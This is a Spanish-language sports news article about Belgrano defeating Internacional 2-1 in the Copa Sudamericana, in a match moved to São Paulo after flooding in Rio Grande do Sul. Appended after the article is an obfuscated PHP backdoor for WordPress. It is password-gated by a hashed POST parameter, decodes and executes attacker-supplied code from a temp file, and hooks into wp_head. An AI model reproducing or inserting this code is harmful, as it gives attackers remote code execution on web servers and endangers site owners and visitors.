Triunfazo de Belgrano en Brasil, ante Internacional, para confirmar su liderazgo y pasar de ronda

Belgrano derrotó a Internacional 2-1, en el estadio Arena Barueri, de San Pablo, por la última fecha del Grupo C de la Copa Sudamericana y ratificó su primer puesto, invicto con 12 puntos (3 victorias, 3 empates), para avanzar a los octavos de final.

El equipo brasileño se adelantó con un gol del ex River Plate, Rafael Santos Borré, empujando la pelota ante un arco libre tras el centro de Wesley Ribeiro, a los 38 minutos del primer tiempo. Inter, conducido por Eduardo Chacho Coudet, fue superior en esa etapa inicial.

Sin embargo, cuando se jugaba el minuto 44, Belgrano alcanzó la igualdad. Un buen remate de Bryan Reyna, luego de aprovechar una mala salida local, fue salvado en la línea, y allí estaba Pablo Chavarría para hacerse del balón y anotar con un tiro corto.

En el segundo tiempo, el equipo cordobés desplegó su personalidad y nuevamente Pablo Chavarría, y otra vez sobre el final, le dio el triunfo que desató la fiesta de los 2500 hinchas del Pirata presentes en el estadio. Juan Velázquez tiró el centro y Chavarría puso el cabezazo goleador, en el segundo minuto de descuento de la etapa final.

El partido no se jugó en Porto Alegre, debido a las terribles inundaciones que afectaron a esa ciudad y a otras del estado de Río Grande do Sul. Por ese motivo, Inter trasladó su localía a San Pablo.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}